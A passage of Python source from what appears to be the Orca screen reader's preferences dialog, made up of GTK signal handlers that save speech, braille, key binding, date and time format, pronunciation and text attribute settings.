            if not (workingFactory == self.speechSystemsChoice):
                workingFactory.SpeechServer.shutdownActiveServers()
            else:
                servers = workingFactory.SpeechServer.getSpeechServers()
                for server in servers:
                    if not (server == self.speechServersChoice):
                        server.shutdown()

    def speechSupportChecked(self, widget):
        """Signal handler for the "toggled" signal for the
           speechSupportCheckButton GtkCheckButton widget. Saves the new
           'enableSpeech' preference and [in]sensitizes the rest of the
           speech pane to match.

        Arguments:
        - widget: the component that generated the signal.
        """

        isChecked = widget.get_active()
        self.prefsDict["enableSpeech"] = isChecked
        # The remaining speech options are meaningless while speech is off.
        self.get_widget("speechOptionsGrid").set_sensitive(isChecked)

    def onlySpeakDisplayedTextToggled(self, widget):
        """Signal handler for the "toggled" signal for the GtkCheckButton
        onlySpeakDisplayedText. Saves the new preference and updates the
        sensitivity of the contextOptionsGrid.

        Arguments:
        - widget: the component that generated the signal.
        """

        onlyDisplayed = widget.get_active()
        self.prefsDict["onlySpeakDisplayedText"] = onlyDisplayed
        # Context options only apply when more than displayed text is
        # spoken, so their sensitivity is the inverse of this toggle.
        self.get_widget("contextOptionsGrid").set_sensitive(not onlyDisplayed)

    def speechSystemsChanged(self, widget):
        """Signal handler for the "changed" signal for the speechSystems
           GtkComboBox widget. Records the newly chosen speech system and
           rebuilds the dependent speech server (and, transitively, voice)
           lists.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Ignore programmatic changes made while the pane is being built.
        if self.initializingSpeech:
            return

        choiceIndex = widget.get_active()
        self.speechSystemsChoice = self.speechSystemsChoices[choiceIndex]
        self._setupSpeechServers()

    def speechServersChanged(self, widget):
        """Signal handler for the "changed" signal for the speechServers
           GtkComboBox widget. Records the newly chosen speech server and
           rebuilds the voice lists.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Ignore programmatic changes made while the pane is being built.
        if self.initializingSpeech:
            return

        serverIndex = widget.get_active()
        self.speechServersChoice = self.speechServersChoices[serverIndex]

        # Whenever the speech servers change, we need to make sure we
        # clear whatever family was in use by the current voice types.
        # Otherwise, we can end up with family names from one server
        # bleeding over (e.g., "Paul" from Fonix ends up getting in
        # the "Default" voice type after we switch to eSpeak).
        try:
            del self.defaultVoice[acss.ACSS.FAMILY]
            del self.uppercaseVoice[acss.ACSS.FAMILY]
            del self.hyperlinkVoice[acss.ACSS.FAMILY]
            del self.systemVoice[acss.ACSS.FAMILY]
        except:
            pass

        self._setupVoices()

    def speechLanguagesChanged(self, widget):
        """Signal handler for the "value_changed" signal for the languages
           GtkComboBox widget. Records the newly chosen voice language,
           restores the family previously picked for that server/language
           pair (if any), and rebuilds the family list.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Ignore programmatic changes made while the pane is being built.
        if self.initializingSpeech:
            return

        selectedIndex = widget.get_active()
        try:
            self.speechLanguagesChoice = \
                self.speechLanguagesChoices[selectedIndex]
            serverAndLanguage = (self.speechServersChoice,
                                 self.speechLanguagesChoice)
            if serverAndLanguage in self.selectedFamilyChoices:
                familyIndex = self.selectedFamilyChoices[serverAndLanguage]
                family = self.speechFamiliesChoices[familyIndex]
                name = family[speechserver.VoiceFamily.NAME]
                language = family[speechserver.VoiceFamily.LANG]
                dialect = family[speechserver.VoiceFamily.DIALECT]
                variant = family[speechserver.VoiceFamily.VARIANT]
                voiceType = self.get_widget("voiceTypesCombo").get_active()
                self._setFamilyNameForVoiceType(
                    voiceType, name, language, dialect, variant)
        except:
            debug.printException(debug.LEVEL_SEVERE)

        # Remember the last language manually selected by the user for the
        # current speech server.
        if selectedIndex != -1:
            self.selectedLanguageChoices[self.speechServersChoice] = \
                selectedIndex

        self._setupFamilies()

    def speechFamiliesChanged(self, widget):
        """Signal handler for the "value_changed" signal for the families
           GtkComboBox widget. Records the newly chosen voice family for
           the current voice type.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Ignore programmatic changes made while the pane is being built.
        if self.initializingSpeech:
            return

        familyIndex = widget.get_active()
        try:
            family = self.speechFamiliesChoices[familyIndex]
            name = family[speechserver.VoiceFamily.NAME]
            language = family[speechserver.VoiceFamily.LANG]
            dialect = family[speechserver.VoiceFamily.DIALECT]
            variant = family[speechserver.VoiceFamily.VARIANT]
            voiceType = self.get_widget("voiceTypesCombo").get_active()
            self._setFamilyNameForVoiceType(
                voiceType, name, language, dialect, variant)
        except:
            debug.printException(debug.LEVEL_SEVERE)

        # Remember the last family manually selected by the user for the
        # current speech server.
        if familyIndex != -1:
            key = (self.speechServersChoice, self.speechLanguagesChoice)
            self.selectedFamilyChoices[key] = familyIndex

    def voiceTypesChanged(self, widget):
        """Signal handler for the "changed" signal on the voiceTypes
        GtkComboBox. Applies the family, rate, pitch and volume values
        associated with the newly selected voice type.

        Arguments:
        - widget: the component that generated the signal.
        """

        if self.initializingSpeech:
            return

        self._setVoiceSettingsForVoiceType(widget.get_active())

    def rateValueChanged(self, widget):
        """Signal handler for the "value_changed" signal on the rateScale
        GtkScale. Saves the new rate for the currently selected voice type
        and mirrors it into the default voice of the 'voices' setting.

        Arguments:
        - widget: the component that generated the signal.
        """

        newRate = widget.get_value()
        activeVoiceType = self.get_widget("voiceTypesCombo").get_active()
        self._setRateForVoiceType(activeVoiceType, newRate)
        voices = _settingsManager.getSetting('voices')
        voices[settings.DEFAULT_VOICE][acss.ACSS.RATE] = newRate
        _settingsManager.setSetting('voices', voices)

    def pitchValueChanged(self, widget):
        """Signal handler for the "value_changed" signal on the pitchScale
        GtkScale. Saves the new pitch for the currently selected voice type
        and mirrors it into the default voice of the 'voices' setting.

        Arguments:
        - widget: the component that generated the signal.
        """

        newPitch = widget.get_value()
        activeVoiceType = self.get_widget("voiceTypesCombo").get_active()
        self._setPitchForVoiceType(activeVoiceType, newPitch)
        voices = _settingsManager.getSetting('voices')
        voices[settings.DEFAULT_VOICE][acss.ACSS.AVERAGE_PITCH] = newPitch
        _settingsManager.setSetting('voices', voices)

    def volumeValueChanged(self, widget):
        """Signal handler for the "value_changed" signal on the voiceScale
        GtkScale. Saves the new volume for the currently selected voice
        type and mirrors it into the default voice of the 'voices' setting.

        Arguments:
        - widget: the component that generated the signal.
        """

        newVolume = widget.get_value()
        activeVoiceType = self.get_widget("voiceTypesCombo").get_active()
        self._setVolumeForVoiceType(activeVoiceType, newVolume)
        voices = _settingsManager.getSetting('voices')
        voices[settings.DEFAULT_VOICE][acss.ACSS.GAIN] = newVolume
        _settingsManager.setSetting('voices', voices)

    def checkButtonToggled(self, widget):
        """Generic "toggled" handler for plain GtkCheckButton widgets:
        stores the widget's active state in the preferences dictionary.

        Convention: a widget whose builder id is settingNameCheckButton
        controls the preference named settingName.

        Arguments:
        - widget: the component that generated the signal.
        """

        widgetName = Gtk.Buildable.get_name(widget)
        # Drop the trailing "CheckButton" to recover the setting name.
        settingName = widgetName[:-len("CheckButton")]
        self.prefsDict[settingName] = widget.get_active()

    def keyEchoChecked(self, widget):
        """Signal handler for the "toggled" signal on the
        keyEchoCheckbutton GtkCheckButton. Stores the new state in the
        'enableKeyEcho' preference and updates the sensitivity of the
        dependent key-echo checkboxes.

        Arguments:
        - widget: the component that generated the signal.
        """

        isEnabled = widget.get_active()
        self.prefsDict["enableKeyEcho"] = isEnabled
        self._setKeyEchoItems()

    def brailleSelectionChanged(self, widget):
        """Signal handler for the "toggled" signal on the braille
        selection indicator GtkRadioButton group. Only reacts when a
        button becomes selected (not when one loses the selection) and
        stores the matching constant in 'brailleSelectorIndicator'.

        Arguments:
        - widget: the component that generated the signal.
        """

        if not widget.get_active():
            return

        label = widget.get_label()
        if label == guilabels.BRAILLE_DOT_7:
            indicator = settings.BRAILLE_UNDERLINE_7
        elif label == guilabels.BRAILLE_DOT_8:
            indicator = settings.BRAILLE_UNDERLINE_8
        elif label == guilabels.BRAILLE_DOT_7_8:
            indicator = settings.BRAILLE_UNDERLINE_BOTH
        else:
            indicator = settings.BRAILLE_UNDERLINE_NONE
        self.prefsDict["brailleSelectorIndicator"] = indicator

    def brailleLinkChanged(self, widget):
        """Signal handler for the "toggled" signal on the braille link
        indicator GtkRadioButton group. Only reacts when a button becomes
        selected (not when one loses the selection) and stores the
        matching constant in 'brailleLinkIndicator'.

        Arguments:
        - widget: the component that generated the signal.
        """

        if not widget.get_active():
            return

        label = widget.get_label()
        if label == guilabels.BRAILLE_DOT_7:
            indicator = settings.BRAILLE_UNDERLINE_7
        elif label == guilabels.BRAILLE_DOT_8:
            indicator = settings.BRAILLE_UNDERLINE_8
        elif label == guilabels.BRAILLE_DOT_7_8:
            indicator = settings.BRAILLE_UNDERLINE_BOTH
        else:
            indicator = settings.BRAILLE_UNDERLINE_NONE
        self.prefsDict["brailleLinkIndicator"] = indicator

    def brailleIndicatorChanged(self, widget):
        """Signal handler for the "toggled" signal on the text-attribute
        braille indicator GtkRadioButton group. Only reacts when a button
        becomes selected (not when one loses the selection) and stores the
        matching constant in 'textAttributesBrailleIndicator'.

        Arguments:
        - widget: the component that generated the signal.
        """

        if not widget.get_active():
            return

        label = widget.get_label()
        if label == guilabels.BRAILLE_DOT_7:
            indicator = settings.BRAILLE_UNDERLINE_7
        elif label == guilabels.BRAILLE_DOT_8:
            indicator = settings.BRAILLE_UNDERLINE_8
        elif label == guilabels.BRAILLE_DOT_7_8:
            indicator = settings.BRAILLE_UNDERLINE_BOTH
        else:
            indicator = settings.BRAILLE_UNDERLINE_NONE
        self.prefsDict["textAttributesBrailleIndicator"] = indicator

    def punctuationLevelChanged(self, widget):
        """Signal handler for the "toggled" signal on the punctuation
        level GtkRadioButton group. Only reacts when a button becomes
        selected (not when one loses the selection) and stores the
        matching constant in 'verbalizePunctuationStyle'.

        Arguments:
        - widget: the component that generated the signal.
        """

        if not widget.get_active():
            return

        label = widget.get_label()
        if label == guilabels.PUNCTUATION_STYLE_NONE:
            style = settings.PUNCTUATION_STYLE_NONE
        elif label == guilabels.PUNCTUATION_STYLE_SOME:
            style = settings.PUNCTUATION_STYLE_SOME
        elif label == guilabels.PUNCTUATION_STYLE_MOST:
            style = settings.PUNCTUATION_STYLE_MOST
        else:
            style = settings.PUNCTUATION_STYLE_ALL
        self.prefsDict["verbalizePunctuationStyle"] = style

    def orcaModifierChanged(self, widget):
        """Signal handler for the changed signal on the
        orcaModifierComboBox. Stores the chosen modifier key names in the
        'orcaModifierKeys' preference.

        Arguments:
        - widget: the component that generated the signal.
        """

        activeIter = widget.get_active_iter()
        # The combo entry is a comma-separated list of key names.
        keyListString = widget.get_model()[activeIter][0]
        self.prefsDict["orcaModifierKeys"] = keyListString.split(', ')

    def progressBarVerbosityChanged(self, widget):
        """Signal handler for the changed signal on the
        progressBarVerbosity GtkComboBox. Stores the matching constant in
        the 'progressBarVerbosity' preference.

        Arguments:
        - widget: the component that generated the signal.
        """

        verbosityLabel = widget.get_model()[widget.get_active_iter()][0]
        if verbosityLabel == guilabels.PROGRESS_BAR_ALL:
            verbosity = settings.PROGRESS_BAR_ALL
        elif verbosityLabel == guilabels.PROGRESS_BAR_WINDOW:
            verbosity = settings.PROGRESS_BAR_WINDOW
        else:
            verbosity = settings.PROGRESS_BAR_APPLICATION
        self.prefsDict["progressBarVerbosity"] = verbosity

    def capitalizationStyleChanged(self, widget):
        """Signal handler for the "changed" signal on the capitalization
        style GtkComboBox. Stores the matching constant in the
        'capitalizationStyle' preference and asks the speech module to
        pick the change up immediately.

        Arguments:
        - widget: the component that generated the signal.
        """

        styleLabel = widget.get_model()[widget.get_active_iter()][0]
        if styleLabel == guilabels.CAPITALIZATION_STYLE_ICON:
            newStyle = settings.CAPITALIZATION_STYLE_ICON
        elif styleLabel == guilabels.CAPITALIZATION_STYLE_SPELL:
            newStyle = settings.CAPITALIZATION_STYLE_SPELL
        else:
            newStyle = settings.CAPITALIZATION_STYLE_NONE
        self.prefsDict["capitalizationStyle"] = newStyle
        speech.updateCapitalizationStyle()

    def sayAllStyleChanged(self, widget):
        """Signal handler for the "changed" signal on the sayAllStyle
        GtkComboBox. Stores the matching constant in the 'sayAllStyle'
        preference; unrecognized labels leave the preference untouched.

        Arguments:
        - widget: the component that generated the signal.
        """

        styleLabel = widget.get_model()[widget.get_active_iter()][0]
        if styleLabel == guilabels.SAY_ALL_STYLE_LINE:
            self.prefsDict["sayAllStyle"] = settings.SAYALL_STYLE_LINE
        elif styleLabel == guilabels.SAY_ALL_STYLE_SENTENCE:
            self.prefsDict["sayAllStyle"] = settings.SAYALL_STYLE_SENTENCE

    def dateFormatChanged(self, widget):
        """Signal handler for the "changed" signal for the dateFormat
           GtkComboBox widget. Set the 'presentDateFormat' preference to
           the format string matching the selected combo box index.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Map combo box indices onto the corresponding format strings.
        formats = {
            DATE_FORMAT_LOCALE: messages.DATE_FORMAT_LOCALE,
            DATE_FORMAT_NUMBERS_DM: messages.DATE_FORMAT_NUMBERS_DM,
            DATE_FORMAT_NUMBERS_MD: messages.DATE_FORMAT_NUMBERS_MD,
            DATE_FORMAT_NUMBERS_DMY: messages.DATE_FORMAT_NUMBERS_DMY,
            DATE_FORMAT_NUMBERS_MDY: messages.DATE_FORMAT_NUMBERS_MDY,
            DATE_FORMAT_NUMBERS_YMD: messages.DATE_FORMAT_NUMBERS_YMD,
            DATE_FORMAT_FULL_DM: messages.DATE_FORMAT_FULL_DM,
            DATE_FORMAT_FULL_MD: messages.DATE_FORMAT_FULL_MD,
            DATE_FORMAT_FULL_DMY: messages.DATE_FORMAT_FULL_DMY,
            DATE_FORMAT_FULL_MDY: messages.DATE_FORMAT_FULL_MDY,
            DATE_FORMAT_FULL_YMD: messages.DATE_FORMAT_FULL_YMD,
            DATE_FORMAT_ABBREVIATED_DM: messages.DATE_FORMAT_ABBREVIATED_DM,
            DATE_FORMAT_ABBREVIATED_MD: messages.DATE_FORMAT_ABBREVIATED_MD,
            DATE_FORMAT_ABBREVIATED_DMY: messages.DATE_FORMAT_ABBREVIATED_DMY,
            DATE_FORMAT_ABBREVIATED_MDY: messages.DATE_FORMAT_ABBREVIATED_MDY,
            DATE_FORMAT_ABBREVIATED_YMD: messages.DATE_FORMAT_ABBREVIATED_YMD,
        }
        dateFormatCombo = widget.get_active()
        try:
            newFormat = formats[dateFormatCombo]
        except KeyError:
            # No active item (get_active() returns -1) or an unknown
            # index. The original elif chain left newFormat unbound here,
            # raising UnboundLocalError; leave the preference unchanged
            # instead.
            return
        self.prefsDict["presentDateFormat"] = newFormat
    
    def timeFormatChanged(self, widget):
        """Signal handler for the "changed" signal for the timeFormat
           GtkComboBox widget. Set the 'presentTimeFormat' preference to
           the format string matching the selected combo box index.

        Arguments:
        - widget: the component that generated the signal.
        """

        # Map combo box indices onto the corresponding format strings.
        formats = {
            TIME_FORMAT_LOCALE: messages.TIME_FORMAT_LOCALE,
            TIME_FORMAT_12_HM: messages.TIME_FORMAT_12_HM,
            TIME_FORMAT_12_HMS: messages.TIME_FORMAT_12_HMS,
            TIME_FORMAT_24_HMS: messages.TIME_FORMAT_24_HMS,
            TIME_FORMAT_24_HMS_WITH_WORDS: messages.TIME_FORMAT_24_HMS_WITH_WORDS,
            TIME_FORMAT_24_HM: messages.TIME_FORMAT_24_HM,
            TIME_FORMAT_24_HM_WITH_WORDS: messages.TIME_FORMAT_24_HM_WITH_WORDS,
        }
        timeFormatCombo = widget.get_active()
        try:
            newFormat = formats[timeFormatCombo]
        except KeyError:
            # No active item (get_active() returns -1) or an unknown
            # index. The original elif chain left newFormat unbound here,
            # raising UnboundLocalError; leave the preference unchanged
            # instead.
            return
        self.prefsDict["presentTimeFormat"] = newFormat

    def speechVerbosityChanged(self, widget):
        """Signal handler for the "toggled" signal on the speech verbosity
        GtkRadioButton group. Only reacts when a button becomes selected
        (not when one loses the selection) and stores the matching
        constant in 'speechVerbosityLevel'.

        Arguments:
        - widget: the component that generated the signal.
        """

        if not widget.get_active():
            return

        if widget.get_label() == guilabels.VERBOSITY_LEVEL_BRIEF:
            level = settings.VERBOSITY_LEVEL_BRIEF
        else:
            level = settings.VERBOSITY_LEVEL_VERBOSE
        self.prefsDict["speechVerbosityLevel"] = level

    def progressBarUpdateIntervalValueChanged(self, widget):
        """Signal handler for the "value_changed" signal on the
        progressBarUpdateIntervalSpinButton GtkSpinButton. Stores the new
        interval in the 'progressBarUpdateInterval' preference.

        Arguments:
        - widget: the component that generated the signal.
        """

        interval = widget.get_value_as_int()
        self.prefsDict["progressBarUpdateInterval"] = interval

    def brailleFlashTimeValueChanged(self, widget):
        """Signal handler for the "value_changed" signal on the braille
        flash time GtkSpinButton. Stores the value, converted from seconds
        to milliseconds, in the 'brailleFlashTime' preference.

        Arguments:
        - widget: the component that generated the signal.
        """

        seconds = widget.get_value_as_int()
        self.prefsDict["brailleFlashTime"] = seconds * 1000

    def abbrevRolenamesChecked(self, widget):
        """Signal handler for the "toggled" signal on the abbrevRolenames
        GtkCheckButton. Stores the matching rolename style constant in
        the 'brailleRolenameStyle' preference.

        Arguments:
        - widget: the component that generated the signal.
        """

        if widget.get_active():
            style = settings.BRAILLE_ROLENAME_STYLE_SHORT
        else:
            style = settings.BRAILLE_ROLENAME_STYLE_LONG
        self.prefsDict["brailleRolenameStyle"] = style

    def brailleVerbosityChanged(self, widget):
        """Signal handler for the "toggled" signal on the braille
        verbosity GtkRadioButton group. Only reacts when a button becomes
        selected (not when one loses the selection) and stores the
        matching constant in 'brailleVerbosityLevel'.

        Arguments:
        - widget: the component that generated the signal.
        """

        if not widget.get_active():
            return

        if widget.get_label() == guilabels.VERBOSITY_LEVEL_BRIEF:
            level = settings.VERBOSITY_LEVEL_BRIEF
        else:
            level = settings.VERBOSITY_LEVEL_VERBOSE
        self.prefsDict["brailleVerbosityLevel"] = level

    def keyModifiedToggle(self, cell, path, model, col):
        """Inverts the boolean "modified" flag stored at model[path][col]
        when the user toggles a checkbox cell in the key bindings view.
        """

        model[path][col] = not model[path][col]

    def editingKey(self, cell, editable, path, treeModel):
        """Begins capture of a new key for the selected key binding:
        announces the prompt, flags key capture mode, and hooks the
        key-press handler onto the editable cell.
        """

        self._presentMessage(messages.KB_ENTER_NEW_KEY)
        orca_state.capturingKeys = True
        editable.connect('key-press-event', self.kbKeyPressed)

    def editingCanceledKey(self, editable):
        """Ends key capture for the selected key binding and discards any
        partially captured key.
        """

        orca_state.capturingKeys = False
        self._capturedKey = []

    def _processKeyCaptured(self, keyPressedEvent):
        """Called when a new key event arrives and we are capturing keys.
        (used for key bindings redefinition)

        Updates self._capturedKey, a [keyName, modifierMask, clickCount]
        list, and returns True when the press contributes a capturable
        key (False for modifier-only presses).
        """

        # We want the keyname rather than the printable character.
        # If it's not on the keypad, get the name of the unshifted
        # character. (i.e. "1" instead of "!")
        #
        keycode = keyPressedEvent.hardware_keycode
        keymap = Gdk.Keymap.get_default()
        entries_for_keycode = keymap.get_entries_for_keycode(keycode)
        entries = entries_for_keycode[-1]
        eventString = Gdk.keyval_name(entries[0])
        eventState = keyPressedEvent.state

        # Pressing the Orca modifier itself just arms the Orca mask for
        # the key that follows.
        orcaMods = settings.orcaModifierKeys
        if eventString in orcaMods:
            self._capturedKey = ['', keybindings.ORCA_MODIFIER_MASK, 0]
            return False

        # Ordinary modifier presses are not capturable keys by themselves.
        modifierKeys =  ['Alt_L', 'Alt_R', 'Control_L', 'Control_R',
                         'Shift_L', 'Shift_R', 'Meta_L', 'Meta_R',
                         'Num_Lock', 'Caps_Lock', 'Shift_Lock']
        if eventString in modifierKeys:
            return False

        # Keep only the modifier bits relevant to accelerators.
        eventState = eventState & Gtk.accelerator_get_default_mod_mask()
        if not self._capturedKey \
           or eventString in ['Return', 'Escape']:
            self._capturedKey = [eventString, eventState, 1]
            return True

        # A further press while a key is already captured: if the Orca
        # modifier was armed, fold its mask back in and count this press
        # as an additional click.
        string, modifiers, clickCount = self._capturedKey
        isOrcaModifier = modifiers & keybindings.ORCA_MODIFIER_MASK
        if isOrcaModifier:
            eventState |= keybindings.ORCA_MODIFIER_MASK
            self._capturedKey = [eventString, eventState, clickCount + 1]

        return True

    def kbKeyPressed(self, editable, event):
        """Special handler for the key_pressed events when editing the
        keybindings.  This lets us control what gets inserted into the
        entry.

        Returns True when the event has been consumed and should not be
        propagated further.
        """

        keyProcessed = self._processKeyCaptured(event)
        if not keyProcessed:
            return True

        if not self._capturedKey:
            return False

        keyName, modifiers, clickCount = self._capturedKey
        if not keyName or keyName in ["Return", "Escape"]:
            return False

        # Delete/BackSpace (without the Orca modifier) clears the binding.
        isOrcaModifier = modifiers & keybindings.ORCA_MODIFIER_MASK
        if keyName in ["Delete", "BackSpace"] and not isOrcaModifier:
            editable.set_text("")
            self._presentMessage(messages.KB_DELETED)
            self._capturedKey = []
            self.newBinding = None
            return True

        self.newBinding = keybindings.KeyBinding(keyName,
                                                 keybindings.defaultModifierMask,
                                                 modifiers,
                                                 None,
                                                 clickCount)
        modifierNames = keybindings.getModifierNames(modifiers)
        clickCountString = self._clickCountToString(clickCount)
        newString = modifierNames + keyName + clickCountString
        description = self.pendingKeyBindings.get(newString)

        # If the captured combination is not among the pending edits, see
        # whether it is already bound to an existing handler.
        if description is None:
            match = lambda x: x.keysymstring == keyName \
                          and x.modifiers == modifiers \
                          and x.click_count == clickCount \
                          and x.handler
            matches = list(filter(match, self.kbindings.keyBindings))
            if matches:
                description = matches[0].handler.description

        if description:
            # Already bound: announce the conflict (after the double-click
            # timeout) and do not insert the text into the entry.
            msg = messages.KB_ALREADY_BOUND % description
            delay = int(1000 * settings.doubleClickTimeout)
            GLib.timeout_add(delay, self._presentMessage, msg)
        else:
            msg = messages.KB_CAPTURED % newString
            editable.set_text(newString)
            self._presentMessage(msg)

        return True

    def editedKey(self, cell, path, new_text, treeModel,
                  modMask, modUsed, key, click_count, text):
        """The user changed the key for a Keybinding: update the model of
        the treeview.

        Arguments:
        - cell: the cell renderer that was edited
        - path: tree-path string identifying the edited row
        - new_text: the newly captured binding string
        - treeModel: the model backing the key bindings treeview
        - modMask, modUsed, key, click_count, text: model column indices
        """

        orca_state.capturingKeys = False
        self._capturedKey = []
        myiter = treeModel.get_iter_from_string(path)
        try:
            originalBinding = treeModel.get_value(myiter, text)
        except:
            # No previous value in this column; treat as empty.
            originalBinding = ''
        modified = (originalBinding != new_text)

        # Pull the binding recorded by kbKeyPressed; fall back to an empty
        # binding when nothing was captured (newBinding may be None).
        try:
            string = self.newBinding.keysymstring
            mods = self.newBinding.modifiers
            clickCount = self.newBinding.click_count
        except:
            string = ''
            mods = 0
            clickCount = 1

        # Drop the shift-lock bit when the Orca modifier is in use.
        mods = mods & Gdk.ModifierType.MODIFIER_MASK
        if mods & (1 << pyatspi.MODIFIER_SHIFTLOCK) \
           and mods & keybindings.ORCA_MODIFIER_MASK:
            mods ^= (1 << pyatspi.MODIFIER_SHIFTLOCK)

        treeModel.set(myiter,
                      modMask, str(keybindings.defaultModifierMask),
                      modUsed, str(int(mods)),
                      key, string,
                      text, new_text,
                      click_count, str(clickCount),
                      MODIF, modified)
        speech.stop()
        if new_text:
            message = messages.KB_CAPTURED_CONFIRMATION % new_text
            description = treeModel.get_value(myiter, DESCRIP)
            self.pendingKeyBindings[new_text] = description
        else:
            message = messages.KB_DELETED_CONFIRMATION

        # Only announce, and remember the binding that was replaced, when
        # the text actually changed.
        if modified:
            self._presentMessage(message)
            self.pendingKeyBindings[originalBinding] = ""

        return

    def presentToolTipsChecked(self, widget):
        """Signal handler for the "toggled" signal on the
        presentToolTipsCheckButton GtkCheckButton. Stores the checkbox
        state in the 'presentToolTips' preference.

        Arguments:
        - widget: the component that generated the signal.
        """

        isChecked = widget.get_active()
        self.prefsDict["presentToolTips"] = isChecked

    def keyboardLayoutChanged(self, widget):
        """Signal handler for the "toggled" signal on the
        generalDesktopButton / generalLaptopButton GtkRadioButton group.
        Only reacts when a button becomes selected (not when one loses
        the selection) and stores both the 'keyboardLayout' preference
        and the matching list of Orca modifier keys.

        Arguments:
        - widget: the component that generated the signal.
        """

        if not widget.get_active():
            return

        if widget.get_label() == guilabels.KEYBOARD_LAYOUT_DESKTOP:
            layout = settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP
            modifierKeys = settings.DESKTOP_MODIFIER_KEYS
        else:
            layout = settings.GENERAL_KEYBOARD_LAYOUT_LAPTOP
            modifierKeys = settings.LAPTOP_MODIFIER_KEYS
        self.prefsDict["keyboardLayout"] = layout
        self.prefsDict["orcaModifierKeys"] = modifierKeys

    def pronunciationAddButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        pronunciationAddButton GtkButton widget. Appends a new row with
        empty actual and replacement strings to the pronunciation
        dictionary list and moves focus to it for editing.

        Arguments:
        - widget: the component that generated the signal.
        """

        model = self.pronunciationView.get_model()
        newIter = model.append()
        model.set(newIter, ACTUAL, "", REPLACEMENT, "")
        newPath = model.get_path(newIter)
        firstColumn = self.pronunciationView.get_column(0)
        self.pronunciationView.grab_focus()
        self.pronunciationView.set_cursor(newPath, firstColumn, True)

    def pronunciationDeleteButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        pronunciationDeleteButton GtkButton widget. The user has clicked
        the Delete button on the Pronunciation pane. The row in the
        pronunciation dictionary list with focus will be deleted.

        Arguments:
        - widget: the component that generated the signal.
        """

        model, oldIter = self.pronunciationView.get_selection().get_selected()
        # get_selected() returns a None iterator when no row is selected;
        # deleting in that case would raise, so ignore the click instead.
        if oldIter is not None:
            model.remove(oldIter)

    def textSelectAllButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textSelectAllButton GtkButton widget. Checks every text attribute
        for both speech and braille, then refreshes the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        allAttributes = _settingsManager.getSetting('allTextAttributes')
        view = self.getTextAttributesView
        self._setSpokenTextAttributes(view, allAttributes, True)
        self._setBrailledTextAttributes(view, allAttributes, True)
        self._updateTextDictEntry()

    def textUnselectAllButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textUnselectAllButton GtkButton widget. Unchecks every text
        attribute for both speech and braille, then refreshes the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        allAttributes = _settingsManager.getSetting('allTextAttributes')
        view = self.getTextAttributesView
        self._setSpokenTextAttributes(view, allAttributes, False)
        self._setBrailledTextAttributes(view, allAttributes, False)
        self._updateTextDictEntry()

    def textResetButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textResetButton GtkButton widget. Restores the text attribute
        checkboxes to the saved settings and then refreshes the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        view = self.getTextAttributesView

        # Start from a clean slate: uncheck everything.
        allAttributes = _settingsManager.getSetting('allTextAttributes')
        self._setSpokenTextAttributes(view, allAttributes, False)
        self._setBrailledTextAttributes(view, allAttributes, False)

        # Re-check only the attributes enabled in the saved settings.
        spoken = _settingsManager.getSetting('enabledSpokenTextAttributes')
        self._setSpokenTextAttributes(view, spoken, True)

        brailled = \
            _settingsManager.getSetting('enabledBrailledTextAttributes')
        self._setBrailledTextAttributes(view, brailled, True)

        self._updateTextDictEntry()

    def textMoveToTopButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveToTopButton GtkButton widget. Moves the selected rows of
        the text attribute view to the top of the list and then refreshes
        the "enabledSpokenTextAttributes" and
        "enabledBrailledTextAttributes" preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        selection = self.getTextAttributesView.get_selection()
        model, paths = selection.get_selected_rows()
        for path in paths:
            model.move_after(model.get_iter(path), None)
        self._updateTextDictEntry()

    def textMoveUpOneButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveUpOneButton GtkButton widget. Moves each selected row of
        the text attribute view up one position (rows already at the top
        stay put) and then refreshes the "enabledSpokenTextAttributes"
        and "enabledBrailledTextAttributes" preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        selection = self.getTextAttributesView.get_selection()
        model, paths = selection.get_selected_rows()
        for path in paths:
            rowIndex = path.get_indices()[0]
            if rowIndex:
                current = model.get_iter(path)
                above = model.iter_nth_child(None, rowIndex - 1)
                model.swap(current, above)
        self._updateTextDictEntry()

    def textMoveDownOneButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveDownOneButton GtkButton widget. Moves each selected row
        of the text attribute view down one position, then updates the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        selection = self.getTextAttributesView.get_selection()
        model, selectedPaths = selection.get_selected_rows()
        lastIndex = model.iter_n_children(None) - 1
        for selectedPath in selectedPaths:
            rowIndex = selectedPath.get_indices()[0]
            # The last row has nothing below it to swap with.
            if rowIndex < lastIndex:
                rowIter = model.get_iter(selectedPath)
                model.swap(rowIter, model.iter_next(rowIter))
        self._updateTextDictEntry()

    def textMoveToBottomButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the
        textMoveToBottomButton GtkButton widget. Moves each selected row
        of the text attribute view to the bottom of the list, then
        updates the "enabledSpokenTextAttributes" and
        "enabledBrailledTextAttributes" preference strings.

        Arguments:
        - widget: the component that generated the signal.
        """

        selection = self.getTextAttributesView.get_selection()
        model, selectedPaths = selection.get_selected_rows()
        for selectedPath in selectedPaths:
            rowIter = model.get_iter(selectedPath)
            # move_before with a None sibling places the row last.
            model.move_before(rowIter, None)
        self._updateTextDictEntry()

    def helpButtonClicked(self, widget):
        """Signal handler for the "clicked" signal for the helpButton
           GtkButton widget. The user has clicked the Help button.

        Arguments:
        - widget: the component that generated the signal.
        """

